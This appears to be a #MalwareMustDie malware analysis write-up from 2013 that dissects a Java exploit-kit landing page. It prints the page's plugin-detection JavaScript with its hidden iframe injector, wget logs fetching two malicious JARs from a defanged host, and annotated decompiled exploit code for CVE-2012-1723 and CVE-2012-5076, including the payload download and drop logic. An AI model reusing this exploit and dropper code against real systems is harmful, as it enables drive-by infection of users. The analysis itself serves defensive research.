"]}}catch(e){}})();'));if(g.head.firstChild){g.head.insertBefore(c,g.head.firstChild)}else{g.head.appendChild(c)}g.head.removeChild(c)}catch(i){}if(g[a]&&g.isArray(g[a])){f.result=[].concat(g[a])}}return f.result}}},applet:{$:1,results:[[null,null],[null,null],[null,null]],getResult:function(){var c=this.results,a,b=[];for(a=0;a<c.length;a++){b=c[a];if(b[0]){break}}return[].concat(b)},HTML:[0,0,0],active:[0,0,0],DummyObjTagHTML:0,DummySpanTagHTML:0,allowed:[1,1,1],VerifyTagsHas:function(c){var d=this,b;for(b=0;b<d.allowed.length;b++){if(d.allowed[b]===c){return 1}}return 0},saveAsVerifyTagsArray:function(c){var b=this,d=b.$,a;if(d.isArray(c)){for(a=0;a<b.allowed.length;a++){if(d.isNum(c[a])){if(c[a]<0){c[a]=0}if(c[a]>3){c[a]=3}b.allowed[a]=c[a]}}}},setVerifyTagsArray:function(d){var b=this,c=b.$,a=b.$$;if(a.getVersionDone===null){b.saveAsVerifyTagsArray(a.getVerifyTagsDefault())}if(a.debug||(a.verify&&a.verify.isEnabled())){b.saveAsVerifyTagsArray([3,3,3])}else{if(d){b.saveAsVerifyTagsArray(d)}}},allDisabled:function(){return this.$$.isDisabled.allApplets()},isDisabled:function(d){var b=this,c=b.$,a=b.$$;if(d==2&&!c.isIE){return 1}if(d===0||d==2){return a.isDisabled.ObjectTag()}if(d==1){return a.isDisabled.AppletTag()}},can_Insert_Query:function(b){var a=this;if(a.HTML[b]){return 0}return !a.isDisabled(b)},can_Insert_Query_Any:function(){var b=this,a;for(a=0;a<b.results.length;a++){if(b.can_Insert_Query(a)){return 1}}return 0},should_Insert_Query:function(d){var b=this,e=b.allowed,c=b.$,a=b.$$;if(!b.can_Insert_Query(d)){return 0}if(e[d]==3){return 1}if(e[d]==2.8&&!b.getResult()[0]){return 1}if(e[d]==2.5&&!a.lang.System.getProperty()[0]){return 1}if(e[d]==2.2&&!a.lang.System.getProperty()[0]&&!b.getResult()[0]){return 1}if(!a.nonAppletDetectionOk(a.version0)){if(e[d]==2){return 1}if(e[d]==1&&!b.getResult()[0]){return 1}}return 0},should_Insert_Query_Any:function(){var b=this,a;for(a=0;a<b.allowed.length;a++){if(b.should_Insert_Query(a)){return 1}}return 0},query:function(f){var h,a=this,g=a.$,d=a.$$,i=null,j=null,b=a.results,c;if((b[f][0]&&b[f][1])||(d.debug&&d.OTF<3)){return}c=g.getDOMobj(a.HTML[f],true);if(c){try{i=g.getNum(c.getVersion()+" ");j=c.getVendor()+" ";c.statusbar(g.winLoaded?" ":" ")}catch(h){}if(i&&g.isStrNum(i)){b[f]=[i,j]}else{};try{if(g.isIE&&i&&c.readyState!=4){g.garbage=true;c.parentNode.removeChild(c)}}catch(h){}}},insert_Query_Any:function(){var d=this,i=d.$,e=d.$$,l=d.results,p=d.HTML,a="&nbsp;&nbsp;&nbsp;&nbsp;",g="A.class",m=i.file.getValid(e);if(!m){return d.getResult()}if(e.OTF<1){e.OTF=1}if(d.allDisabled()){return d.getResult()}if(e.OTF<1.5){e.OTF=1.5}var j=m.name+m.ext,h=m.path;var f=["archive",j,"code",g],c=["mayscript","true"],o=["scriptable","true"].concat(c),n=e.navigator,b=!i.isIE&&n.mimeObj&&n.mimeObj.type?n.mimeObj.type:e.mimeType[0];if(d.should_Insert_Query(0)){if(e.OTF<2){e.OTF=2};p[0]=i.isIE?i.insertHTML("object",["type",b],["codebase",h].concat(f).concat(o),a,e):i.insertHTML("object",["type",b],["codebase",h].concat(f).concat(o),a,e);l[0]=[0,0];d.query(0)}if(d.should_Insert_Query(1)){if(e.OTF<2){e.OTF=2};p[1]=i.isIE?i.insertHTML("applet",["alt",a].concat(c).concat(f),["codebase",h].concat(c),a,e):i.insertHTML("applet",["codebase",h,"alt",a].concat(c).concat(f),[].concat(c),a,e);l[1]=[0,0];d.query(1)}if(d.should_Insert_Query(2)){if(e.OTF<2){e.OTF=2};p[2]=i.isIE?i.insertHTML("object",["classid",e.classID],["codebase",h].concat(f).concat(o),a,e):i.insertHTML();l[2]=[0,0];d.query(2)}if(!d.DummyObjTagHTML&&!e.isDisabled.ObjectTag()){d.DummyObjTagHTML=i.insertHTML("object",[],[],a)}if(!d.DummySpanTagHTML){d.DummySpanTagHTML=i.insertHTML("",[],[],a)};var k=e.NOTF;if(e.OTF<3&&k.shouldContinueQuery()){e.OTF=3;k.onIntervalQuery=i.handler(k.$$onIntervalQuery,k);if(!i.winLoaded){i.WLfuncs0.push([k.winOnLoadQuery,k])}setTimeout(k.onIntervalQuery,k.intervalLength)};return d.getResult()}},NOTF:{$:1,count:0,countMax:25,intervalLength:250,shouldContinueQuery:function(){var e=this,d=e.$,c=e.$$,b=c.applet,a;for(a=0;a<b.results.length;a++){if(b.HTML[a]&&!b.results[a][0]&&(b.allowed[a]>=2||(b.allowed[a]==1&&!b.getResult()[0]))&&e.isAppletActive(a)>=0){return 1}}return 0},isJavaActive:function(d){var f=this,c=f.$$,a,b,e=-9;for(a=0;a<c.applet.HTML.length;a++){b=f.isAppletActive(a,d);if(b>e){e=b}}return e},isAppletActive:function(c,a){var d=this,b=d.$$.applet.active;if(!a){b[c]=d.isAppletActive_(c)}return b[c]},isAppletActive_:function(d){var g=this,f=g.$,b=g.$$,l=b.navigator,a=b.applet,h=a.HTML[d],i,k,c=0,j=f.getTagStatus(h,a.DummySpanTagHTML,a.DummyObjTagHTML,g.count);if(j==-2){return -2}try{if(f.isIE&&f.verIE>=b.minIEver&&f.getDOMobj(h).object){return 1}}catch(i){}for(k=0;k<a.active.length;k++){if(a.active[k]>0){c=1}}if(j==1&&(f.isIE||((b.version0&&l.javaEnabled()&&l.mimeObj&&(h.tagName=="object"||c))||b.lang.System.getProperty()[0]))){return 1}if(j<0){return -1}return 0},winOnLoadQuery:function(c,d){var b=d.$$,a;if(b.OTF==3){a=d.queryAllApplets();d.queryCompleted(a[1],a[2])}},$$onIntervalQuery:function(d){var c=d.$,b=d.$$,a;if(b.OTF==3){a=d.queryAllApplets();if(!d.shouldContinueQuery()||(c.winLoaded&&d.count>d.countMax)){d.queryCompleted(a[1],a[2])}}d.count++;if(b.OTF==3){setTimeout(d.onIntervalQuery,d.intervalLength)}},queryAllApplets:function(){var g=this,f=g.$,e=g.$$,d=e.applet,b,a,c;for(b=0;b<d.results.length;b++){d.query(b)}a=d.getResult();c=a[0]?true:false;return[c,a[0],a[1]]},queryCompleted:function(c,f){var e=this,d=e.$,b=e.$$;if(b.OTF>=4){return}b.OTF=4;var a=e.isJavaActive();b.setPluginStatus(c,f,0);if(b.funcs){d.callArray(b.funcs)}if(d.onDoneEmptyDiv){d.onDoneEmptyDiv()}}},zz:0},adobereader:{mimeType:"application/pdf",navPluginObj:null,progID:["AcroPDF.PDF","PDF.PdfCtrl"],classID:"clsid:CA8A9780-280D-11CF-A24D-444553540000",INSTALLED:{},pluginHasMimeType:function(d,c,f){var b=this,e=b.$,a;for(a in d){if(d[a]&&d[a].type&&d[a].type==c){return 1}}if(e.getMimeEnabledPlugin(c,f)){return 1}return 0},getVersion:function(l,j){var g=this,d=g.$,i,f,m,n,b=null,h=null,k=g.mimeType,a,c;if(d.isString(j)){j=j.replace(/\s/g,"");if(j){k=j}}else{j=null}if(d.isDefined(g.INSTALLED[k])){g.installed=g.INSTALLED[k];return}if(!d.isIE){a="Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in";if(g.getVersionDone!==0){g.getVersionDone=0;b=d.getMimeEnabledPlugin(g.mimeType,a);if(!j){n=b}if(!b&&d.hasMimeType(g.mimeType)){b=d.findNavPlugin(a,0)}if(b){g.navPluginObj=b;h=d.getNum(b.description)||d.getNum(b.name);h=d.getPluginFileVersion(b,h);if(!h&&d.OS==1){if(g.pluginHasMimeType(b,"application/vnd.adobe.pdfxml",a)){h="9"}else{if(g.pluginHasMimeType(b,"application/vnd.adobe.x-mars",a)){h="8"}}}}}else{h=g.version}if(!d.isDefined(n)){n=d.getMimeEnabledPlugin(k,a)}g.installed=n&&h?1:(n?0:(g.navPluginObj?-0.2:-1))}else{b=d.getAXO(g.progID[0])||d.getAXO(g.progID[1]);c=/=\s*([\d\.]+)/g;try{f=(b||d.getDOMobj(d.insertHTML("object",["classid",g.classID],["src",""],"",g))).GetVersions();for(m=0;m<5;m++){if(c.test(f)&&(!h||RegExp.$1>h)){h=RegExp.$1}}}catch(i){}g.installed=h?1:(b?0:-1)}if(!g.version){g.version=d.formatNum(h)}g.INSTALLED[k]=g.installed}},zz:0}};actojack.initScript();jimyjoke = actojack.getVersion("Java");if (typeof jimyjoke == "string") {jimyjoke = jimyjoke.split(",");if (jimyjoke[3].length == 1) {jimyjoke = "" + jimyjoke[1] + "0" + jimyjoke[3];} else {jimyjoke = "" + jimyjoke[1] + jimyjoke[3];}} else {jimyjoke = 0;}pdfver = actojack.getVersion("AdobeReader");if (typeof pdfver == "string") {pdfver = pdfver.split(",");pdfver[3] = pdfver[3].substring(0, 1);pdfver = parseInt(pdfver.join(""), 10);} else {pdfver = 0;}
    function ifr(abc) {var dh = document.createElement("iframe");dh.setAttribute("width", 1);dh.setAttribute("height", 1);dh.setAttribute("src", abc);document.body.appendChild(dh);};function pdf(){try{if((pdfver>=8000&&pdfver<=8200)||(pdfver>=9000&&pdfver<=9301)){ifr("lacecape.php");}} catch(e){}}setTimeout(pdf,2110);</script></html>

// see the applet header, there are only 2 downloads in the landing page which lead to jars...

================================================================================

//=====================
//THE FIRST JAR..
//=====================

// let's go to the first applet:

<applet code="ors.class" archive="rgerding/jimmdemy.jar" width="1" height="1">
<param name="bhjwfffiorjwe" value="0jfX19NXhX1MMX0ZltNjk9k/agtjNgs9hgZpBVthZX8.:jfg2.8/N/sljhaf0f/2lMBM9atrZag3Bd38oXfVNsB.fs0jC1BhtgeMZ/8j.30tajCCNNZtt9sX/0Ndga98shkk0CsCVN3VgB0gVkfs09kZi30MBdV..aNsfVftf3nV99fkgt2tBf/jas1.o2sXt2XtfnVh./hj8.itVfkaftCoC/30aCV399d/B1/3M.j8gBljBsn33h/khB9efZZglsj3thkNasMNg/j8.glXXtJZ8.CdXMNdt33ststhohXMZ/38dw92B8gl32u.8Zkg30g39BX21Xkl2lCXaXMjfdj8kC/aZ/s33sf280C2ZdMk9Cj3sd2/1jdaN/adltfB/kjNlNf/k3gaMhBk/8aknVt3/d.MjukXjZldVCdfs/dh2C1ekk3st.f0n.dCdkaZgtB120/Nhj.CjZ.al0jpjCgjC0.Ch3B2lCjZdp">
</applet>

// this leads to the jar with the below Urls,
// passing the bhjwfffiorjwe params to the ors.class to be processed..

// let's fecth the h00p://davidsonfrc89.net/Jdowu32ds2s/rgerding/jimmdemy.jar

--18:33:00--  h00p://davidsonfrc89.net/Jdowu32ds2s/rgerding/jimmdemy.jar
           => `jimmdemy.jar'
Resolving davidsonfrc89.net... seconds 0.00, 217.23.6.57
Caching davidsonfrc89.net => 217.23.6.57
Connecting to davidsonfrc89.net|217.23.6.57|:80... seconds 0.00, connected.
  :
GET /Jdowu32ds2s/rgerding/jimmdemy.jar HTTP/1.0
User-Agent: #MalwareMustDie Playing with your jars
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plai
n;q=0.8,image/png,*/*;q=0.5
Host: davidsonfrc89.net
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx/1.2.6
Date: Tue, 08 Jan 2013 09:32:58 GMT
Content-Type: application/x-java-archive
Content-Length: 9465
Connection: keep-alive
Last-Modified: Sun, 30 Dec 2012 11:22:55 GMT
ETag: "39a0afc-24f9-4d2101e35e1c0"
Accept-Ranges: bytes
  :
200 OK
Registered socket 1896 for persistent reuse.
Length: 9,465 (9.2K) [application/x-java-archive]
100%[====================================>] 9,465         27.48K/s
18:33:01 (27.40 KB/s) - `jimmdemy.jar' saved [9465/9465]

//FIRST JAR's Malicious Activity quick analysis
// Exploit used: CVE-2012-1723

// grab the passed applet parameter here;
// ors.class
import java.applet.Applet;
import java.lang.reflect.Method;

public class ors extends Applet
{ public static String B;
  public static String M;
  public static String C = G.L("*_uR+P*Q)O5Wc").replace(G.L("T)R*Q(S5O-"), G.L(" Sv"));
  public static String[] I;

// processing & calling G.class...
public static Object L(String a, String a, Object a)
  {  try
    { String str1 = G.L("tR+^+P(~t\017uR+^&Q&R+P$\\'Z'Q*R\004\017z^&P(Q$\\'Z+P$Q&]*P\036b\025");
      Object localObject = G.L("tR+^+P(~t\017uR+^&Q&R+P$\\'Z'Q*R\004\017z^&P(Q$\\'Z+P$Q&]*P\036b\025");
      localObject = G.L("\016-Q*R\004\016u\017(Q$\\+E(R+P$\\'Z'R+^&Q*R\004P(E{b\004Q*^+\\'P*b\025");
      localObject = Class.forName(a);
      String str2 = G.L("");
      int tmp41_40 = 1; tmp41_40; a = a.getMethod(new Class[0], tmp41_40);
      localObject = G.L("\003(Q*R\004\016uQ*R\004\016uQ*R\004\016uQuR+^&Q$\\(Q*^&] ](Q*^&] ]+P(~{qxQ$\\'Z&^+P(E(P+^&\001\004|x\003{");
      int tmp61_60 = 1; tmp61_60; return a.invoke(new Object[0], tmp61_60);
          :

// here's the exploit exists...
// G.class :
import java.io.InputStream;
import java.security.ProtectionDomain;

public class G extends ClassLoader //<== mark the ClassLoader a pattern of CVE-2012-1723
     :

  public static String L(String a)
  { int tmp5_4 = 4;                   // forming public static String to be maps to memory...
    int tmp31_28 = a.length();
    int tmp35_34 = 1;
    tmp35_34;
    int j;
    int ? = tmp35_34;
    int k = tmp31_28;
    int tmp45_41 = (j = new char[tmp31_28] - 1);
    tmp45_41;
    int i = (0x3 ^ 0x5) << 3 ^ (0x3 ^ 0x5);
    if ((4 << 3 ^ 0x1) >= 0)
    { int tmp54_53 = j;             // some multiple attempts for memory plantations..
      j--;
      ?[tmp54_53] = (char)(a.charAt(tmp54_53) ^ i);
      int tmp72_71 = j;
      j--;
      ?[tmp72_71] = (char)(a.charAt(tmp72_71) ^ k);
    }
    tmp45_41.<init>(?);
    return tmp5_4 << tmp5_4 ^ (0x3 ^ 0x5) << 1;    }


// act of sec bypass to download+saving payloads...

public static void L(G a)
  {  try
    {  String str = G.L("tR+^&Q*R$Q&]*P\036b\025");
      InputStream tmp16_13 =
        a.getResourceAsStream(m.L("V'RqT3V,D"));
      int i;
      int tmp25_24 = 1; tmp25_24;
      int ?;
      Object localObject = K.L();
      new byte[
        i = tmp16_13.available()]
        .read(? = tmp25_24,
        0, i);
      int tmp43_42 = ?;
      localObject = G.L(
        tmp16_13
        .defineClass("axe", tmp43_42, 0, tmp43_42.length, (ProtectionDomain)localObject));// <=== here
      return;
            a;    }
    catch (Exception localException1){}} // the local exception wasn't defined..


// what's in the axe.class?
// the saving of payload via localObject3 by new FileOutputStream
// using strings fromed by localObject2 & localObject2

import java.io.FileOutputStream;
import java.io.InputStream;
import java.security.PrivilegedExceptionAction;

public class axe
  implements PrivilegedExceptionAction
  {
  public Object run()
  {
    String[] arrayOfString;
    Object localObject1;
    Object localObject2;
    InputStream localInputStream;
    try
    {
      String str1 = L();
      arrayOfString = ors.I;
      localObject1 = G.L("P*^*^*Q(P)R*Q$P+R*S(P+^*Q(P)R*Q(S5O-");
      localObject1 = G.L("P*^*^*Q(P)R*Q$P+R*S(P+^*Q(P)R*Q(S5O-");
      long l = System.currentTimeMillis();
      localObject1 = G.L(")N)");
      new StringBuilder();
      int tmp59_58 = 1; tmp59_58;
      int tmp61_59 = tmp59_58; tmp61_59[0] = Long.valueOf(l); String str4 = String.format(new Object[1], tmp61_59);
      String str2 = G.L("U!Rb\023?\026cUlE8W>Bl");
      int tmp87_86 = 1; tmp87_86;
      int tmp89_87 = tmp87_86; tmp89_87[0] = localObject1; str2 = String.format(new Object[1], tmp89_87);
      String str3 = G.L("P*^*^*Q(P+W(P+T)R*Q(S5O-");
      localObject2 = G.L("*P$P$P+W(P+T)R*Q(S5O-");
      localObject2 = localObject1 + str4;
      localInputStream = A(arrayOfString[localObject1.intValue()]);

      Object localObject3 = new FileOutputStream((String)(String)localObject2);
      int tmp198_197 = 1; tmp198_197; int ? = tmp198_197;
      int i;
      while ((i = localInputStream.read(?, 0, ?.length)) != -1)
      {  ((FileOutputStream)localObject3).write(?, 0, i);
        tmpTernaryOp = localInputStream;
        continue;
        new byte[1024];
      }
      localInputStream.close();
      Object tmp243_241 = localObject3; tmp243_241.flush(); tmp243_241.close();

      M((String)(String)
        (localObject3 = (String)(String)localObject2));
      localObject3 = localObject1 = Integer.valueOf((localObject2 = localObject1)
        .intValue() + 1);
      localObject3 = localObject2;
      (localInputStream = A(localObject2 = ""))
        .close();
      tmpTernaryOp = 0;    }
    catch (Exception localException1)  {    }
    return null; }


//================================

//THE SECOND JAR..CVE-2012-5076

//================================

// the other jar was downloaded here:

//also fetch the h00p://davidsonfrc89.net/Jdowu32ds2s/rgerding/torylane.jar

--18:36:03--  h00p://davidsonfrc89.net/Jdowu32ds2s/rgerding/torylane.jar
           => `torylane.jar'
Resolving davidsonfrc89.net... seconds 0.00, 217.23.6.57
Caching davidsonfrc89.net => 217.23.6.57
Connecting to davidsonfrc89.net|217.23.6.57|:80... seconds 0.00, connected.
  :
GET /Jdowu32ds2s/rgerding/torylane.jar HTTP/1.0
User-Agent: #MalwareMustDie has to change the train....
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plai
n;q=0.8,image/png,*/*;q=0.5
Host: davidsonfrc89.net
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
  :
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx/1.2.6
Date: Tue, 08 Jan 2013 09:36:01 GMT
Content-Type: application/x-java-archive
Content-Length: 5502
Connection: keep-alive
Last-Modified: Tue, 25 Dec 2012 05:55:36 GMT
ETag: "39a0afd-157e-4d1a6f66da600"
Accept-Ranges: bytes
  :
200 OK
Registered socket 1896 for persistent reuse.
Length: 5,502 (5.4K) [application/x-java-archive]
100%[====================================>] 5,502         18.72K/s
18:36:04 (18.70 KB/s) - `torylane.jar' saved [5502/5502]


MD5:    ae66fc69244abec22f20384356806ad2
File size:  5.4 KB ( 5502 bytes )
File name:  torylane.jar
File type:  JAR
Detection ratio:    1 / 46
Analysis date:  2013-01-08 12:50:22 UTC ( 0 分 ago )
https://www.virustotal.com/file/92ad670f3d32c91afffc60c54e9c5d19095d827ec86d2d89ebfa0a7856fa93e8/analysis/1357649422/


// applet params passed:

<applet code="gee.class" archive="rgerding/torylane.jar" width="1" height="1">
<param name="bhjiorjwe" value=".f//9jkMhNVgB1l2tt0djf3j32t21/Z.M0.p1C3X3a/g:1h.ZM2Zs/t1Z/.g92/l0flsta8rV/gXth/1oV3dl0Vj1sM1VMlZjdesXffXhsdtfN1h2VlNtBfCf.8tgaB020sa3fsBkBsX0g8gdlka9jXhiBkVXtV/Cah1fZ9d1gnghX/t39jtt.f2d2k9o.2htZjV2nt/j2ktdXih1NgVfC0oj/NZ90j19NB9.8M98.gaVXa8lMnCC2f3ZtsegXCsd331tZ00hlZdN/N8aB1ktgJ980Vf09Vdjg2Zj0k1og3lNhft8wkaZ/dZf.uftCC0Mf/32lMl9C8k2N/V8dV0Md1kh/CC//sCBBh.8f22/131h132s0BV/dgh//XV3kj2s3jg0jgBXkNajljC8sMXn0lZ/N93tuM9d0CgCtdl8gVMBk0eVMfNB1tjn8Ndhflg0t3CMX.aXa.//0hN3akpfhV8l0s/hkgjNZVkgp">
</applet>

// the gee.class... th epassed applet params goes here...
import java.applet.Applet;
import java.io.InputStream;
import java.lang.reflect.Constructor;
import java.lang.reflect.Method;

public class gee extends Applet
  public static java.net.URL g(String a) // <==== see the "a" object = url..
  {

// pet.class... the url logic buider

import java.security.PrivilegedExceptionAction; // Attempt to to use Security exception...

public class pet
  implements PrivilegedExceptionAction {} // Security exception performed...
   public static String A(String a)       //here!
    {
    int tmp25_22 = a.length();
    int tmp29_28 = 1;
    tmp29_28;
    int j;
    int ? = tmp29_28;
    int k = tmp25_22;
    int tmp39_35 = (j = new char[tmp25_22] - 1);
    tmp39_35;
    int i = 4;
    ((0x3 ^ 0x5) << 3 ^ (0x2 ^ 0x5));
    if (tmp39_35 >= 0)
    {
      int tmp49_48 = j;
      j--;
      ?[tmp49_48] = (char)(a.charAt(tmp49_48) ^ i);
      int tmp67_66 = j;
      j--;
      ?[tmp67_66] = (char)(a.charAt(tmp67_66) ^ k);
    }
    ((0x3 ^ 0x5) << 4 ^ 0x1).<init>(?);
    return new java/lang/String;  }

//calling zin.classs & pet.class for string builder...
   public static Object A(Class a)
   {
    String str1 = pet.A("Pl]cQ`\017bP`QcQ`P`Pl]cQ`lQ`P");
    str1 = zin.A("-\037&\035<\017&5?\031&");
    String str2 = pet.A("c_nPbS<QcSbSbPbScScQ`P`Pl]cQ`lQ`P");
    str1 = new StringBuffer(str1).reverse().toString();
    str2 = zin.A("");
    return A(pet.A("]eAe\031hVjP*thVwD"), str1, a);

// zin.class... the string saved file builder... HERE GOES THE PAYLOAD LOGIC

import java.io.FileOutputStream;
import java.io.InputStream;
   :
 Object localObject3 = new FileOutputStream((String)localObject1);
      int tmp170_169 = 1; tmp170_169; int ? = tmp170_169;
      int i;
      while ((i = localInputStream.read(?, 0, ?.length)) != -1)
      { ((FileOutputStream)localObject3).write(?, 0, i);
        tmpTernaryOp = localInputStream;
        continue;
        new byte[1024];    }

// K.class has the exploit:
public class K
{
  public static String c;
  public static String J;
  public static String l;
  public static String F;
  public static String h;
  public static String d;

static
  { // classes to attack the Java security mode, typical CVE-2012-5076
    K.h = "com.sun.org.glassfish.gmbal.ManagedObjectManagerFactory";
    K.l = "com.sun.org.glassfish.gmbal.util.GenericConstructor";
// Exploit strings
    K.J = new StringBuffer(zin.A("\016-\030)\023\004\017;\035$?;\t'\0211\022'\022\tR&\023&\035f\031#\023>\022!R&\t;")).reverse().toString();
// Obfusctation of the method commands...
    K.F = "create";
    K.d = "loadClass"; // loadClass method to load a malicious payload class....
    K.c = "getMethod";

-----
#MalwareMustDie | @unixfreaxjp ~]$ date
Tue Jan  8 21:36:28 JST 2013
Title:
#MalwareMustDie - Guide JAR CVE-2012-1723 + CVE-2012-5076